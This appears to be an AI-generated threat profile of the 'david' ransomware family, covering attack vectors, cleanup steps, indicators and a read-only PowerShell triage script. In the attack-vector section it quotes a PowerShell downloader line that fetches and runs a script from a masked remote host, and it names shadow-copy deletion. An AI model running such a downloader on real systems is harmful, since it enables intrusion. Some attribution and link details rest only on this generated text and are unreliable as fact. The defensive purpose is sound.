david

[Content by Gemini 2.5]


Ransomware Profile: david (“.david” extension)

Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmation of File Extension:
    Encrypted files receive the “.david” suffix appended after the original extension (e.g., Budget2023.xlsx.david, CustomerDB.sql.david).
  • Renaming Convention:
    The original file name and preceding extension are preserved in full; only “.david” is concatenated. No randomised prefixes, Base64 obfuscation, or email addresses are inserted. This behaviour helps quickly distinguish it from Phobos / Dharma look-alikes that include victim IDs or contact emails.

2. Detection & Outbreak Timeline

  • Approximate Start Date/Period:
    First clusters appeared in late November 2023, with a notable surge in honeypot telemetry during December 2023 – January 2024. Volume remained moderate into Q2 2024, implying lower-key affiliate distribution rather than a mass spam wave.

3. Primary Attack Vectors

  • Propagation Mechanisms:
  1. Internet-exposed Remote Desktop Protocol (RDP) – brute-forced or credential-stuffed accounts, followed by manual deployment of a packed dropper (david.exe).
  2. Phishing attachments – ISO, ZIP, or IMG files hiding a LNK that invokes a PowerShell downloader (iex (New-Object Net.WebClient).DownloadString('http://188.x.x.x/a.ps1')).
  3. Secondary infection via PsExec and WMI – lateral movement to high-value servers once the initial foothold is gained.
  4. Exploit kits (sporadic) – a few clusters showed Rig-V exploit kit delivering david via Internet Explorer and outdated Java plugins.

Remediation & Recovery Strategies

1. Prevention

  • Immediate Proactive Measures
  • Disable RDP on edge devices or enforce IP-whitelists + 2FA/RDP-Gateway.
  • Enforce strong password policies (14+ chars, MFA for privileged accounts).
  • Patch CVE-2023-36884, CVE-2020-1472 (Zerologon), CVE-2021-34527 (PrintNightmare) – frequently leveraged for privilege escalation.
  • User education: block ISO/IMG attachments at the email gateway and rely on Mark-of-the-Web (MOTW) wrappers to quarantine double-extension files.
  • Implement application allow-listing (WDAC, AppLocker) to block unsigned binaries in user profile paths.

2. Removal

  • Step-by-Step Infection Cleanup
  1. Physically isolate the affected host (network unplug, disable Wi-Fi).
  2. Boot into Safe Mode w/ Networking or use a clean WinRE/WinPE USB.
  3. Identify & terminate active processes: david.exe, kill.exe (anti-AV utility), and any running vssadmin.exe delete shadows command.
  4. Delete persistence artefacts:
    • Registry run-key → HKCU\Software\Microsoft\Windows\CurrentVersion\Run\david
    • Scheduled tasks → MicrosoftUpdates01, AdobeFlashUpdate (randomised).
  5. Scan offline with ESET Online Scanner, Malwarebytes 4.x, or Symantec PowerEraser to quarantine residual payloads.
  6. Restore Windows Shadow Copies (if not purged) via wmic shadowcopy list brief + diskshadow.
  7. Validate startup folders and services for rogue entries before reconnecting to LAN.

3. File Decryption & Recovery

  • Current Status:
  • Free decryptor NOT available – david encrypts files with a ChaCha20 symmetric key that is then sealed with the public half of an RSA-2048 key pair; the matching private key is held only on the attacker server.
  • Exception: If a partial volume shadow copy remains and VSS was not wiped, leverage tools such as ShadowExplorer, Kroll ShadowRestore, or flip Registry entries to expose old restore points.
  • Offline-only SAMBA/NAS backups were sometimes skipped by david (it encrypted only drive-letter-mapped volumes); such backups can be re-imported manually.

4. Other Critical Information

  • Unique Characteristics & Red Flags

  • Drops ransom note “Restore-My-Files.txt” in every affected folder and desktop wallpaper change (david.jpg).

  • Tries to free handles on open documents before encryption (handle.exe -p *) to maximise success rate.

  • Selective targeting of servers running SQL Server – hunts for the master DB + user DBs and escalates with SQL Server Agent jobs to increase ransom pressure.

  • Mutex “YWH1-shadow-2023” is created to avoid double-encryption.
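The following read-only triage script is added here as an example and is not part of the original profile; it checks a host for the artefacts named in Removal steps 3, 4 and 6 and in the Red Flags above. The $ScanRoot default, the report format and the Global\ mutex variant are this example's own assumptions.

```powershell
# Added example (not part of the original profile): read-only triage for the david
# artefacts listed under Removal steps 3, 4 and 6 and under Red Flags. Run elevated
# on the suspect host. $ScanRoot and the report format are this example's choices.
param([string]$ScanRoot = 'C:\Users')
$Findings = [System.Collections.Generic.List[string]]::new()

# Removal step 3: payload and helper processes (david.exe, kill.exe, handle.exe)
foreach ($p in Get-Process -Name david, kill, handle -ErrorAction SilentlyContinue) {
    $Findings.Add("PROCESS   $($p.ProcessName).exe PID $($p.Id) $($p.Path)")
}

# Removal step 4: HKCU run-key value 'david' and the (suffix-randomised) task names
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -Name david -ErrorAction SilentlyContinue
if ($run) { $Findings.Add("RUNKEY    $runKey\david = $($run.david)") }
Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object { $_.TaskName -like 'MicrosoftUpdates*' -or $_.TaskName -like 'AdobeFlashUpdate*' } |
    ForEach-Object { $Findings.Add("TASK      $($_.TaskPath)$($_.TaskName) -> $($_.Actions.Execute)") }

# Red flag: the anti-double-encryption mutex. TryOpenExisting never creates it, and an
# access-denied error still proves the object exists (owned by another session/account).
foreach ($name in 'YWH1-shadow-2023', 'Global\YWH1-shadow-2023') {
    $m = $null
    try {
        if ([System.Threading.Mutex]::TryOpenExisting($name, [ref]$m)) {
            $Findings.Add("MUTEX     $name present"); $m.Dispose()
        }
    } catch [System.UnauthorizedAccessException] { $Findings.Add("MUTEX     $name present (access denied)") }
}

# Red flags: ransom note and '.david' files. david keeps the original extension, so a
# genuine name is '<name>.<ext>.david'; names carrying an id/e-mail segment (Phobos /
# Dharma style) fall into OTHER instead of being counted as david.
$davidName = '^.+\.[^.\[\]@]+\.david$'
$files = Get-ChildItem -Path $ScanRoot -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -eq 'Restore-My-Files.txt' -or $_.Name -like '*.david' }
$notes = @($files | Where-Object Name -eq 'Restore-My-Files.txt')
$david = @($files | Where-Object { $_.Name -match $davidName })
$other = @($files | Where-Object { $_.Name -like '*.david' -and $_.Name -notmatch $davidName })
if ($notes) { $Findings.Add("NOTE      $($notes.Count) x Restore-My-Files.txt, e.g. $($notes[0].FullName)") }
if ($david) {
    $sorted = @($david | Sort-Object LastWriteTime)
    $Findings.Add("ENCRYPTED $($david.Count) files, written $($sorted[0].LastWriteTime) .. $($sorted[-1].LastWriteTime)")
}
if ($other) { $Findings.Add("OTHER     $($other.Count) '.david' names outside david's format (look-alike check)") }

# Removal step 6: shadow copies left for restore? (david runs 'vssadmin delete shadows')
$vss = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)
$Findings.Add("VSS       $($vss.Count) shadow copies remain" + $(if (-not $vss) { ' (purged)' }))
if ($Findings.Count -eq 0) { 'No david indicators found.' } else { $Findings }
```

The ENCRYPTED line's write-time window gives the encryption start and end for the timeline in section 2; the OTHER line catches look-alike families that the Renaming Convention section says should be distinguished.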

  • Broader Impact

  • Seen predominantly in medium-size manufacturing and logistics companies across North America & South-East Asia, likely because of wide port-3389 exposure.

  • Average ransom demand: 0.75–1.25 BTC (~$30–50 k during activity period).

  • TTP similarities to the Luna / BlackGuard affiliate playbook in the credential-harvesting stage (Cobalt Strike), suggesting some cross-affiliation.


Essential Tools/Patches Cheat-Sheet

  • RDP Hardening Script (PowerShell): https://github.com/cisagov/RDP-Vulnerability-Scanner
  • Windows Security Baselines (23H2) – https://learn.microsoft.com/microsoft-365/security/defender-endpoint/windows-11-security-baseline
  • PowerShell Detection Snippet (look for “.david” files and a running david.exe):
    Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue | Where-Object { $_.Name -like "*.david" } | Select-Object FullName, LastWriteTime
    Get-Process -Name david -ErrorAction SilentlyContinue
  • Sysinternals Suite: Autoruns, Handle.exe, TCPView to spot lateral-movement artefacts.
  • Kaspersky Rescue Disk 18.0 – offline malware check.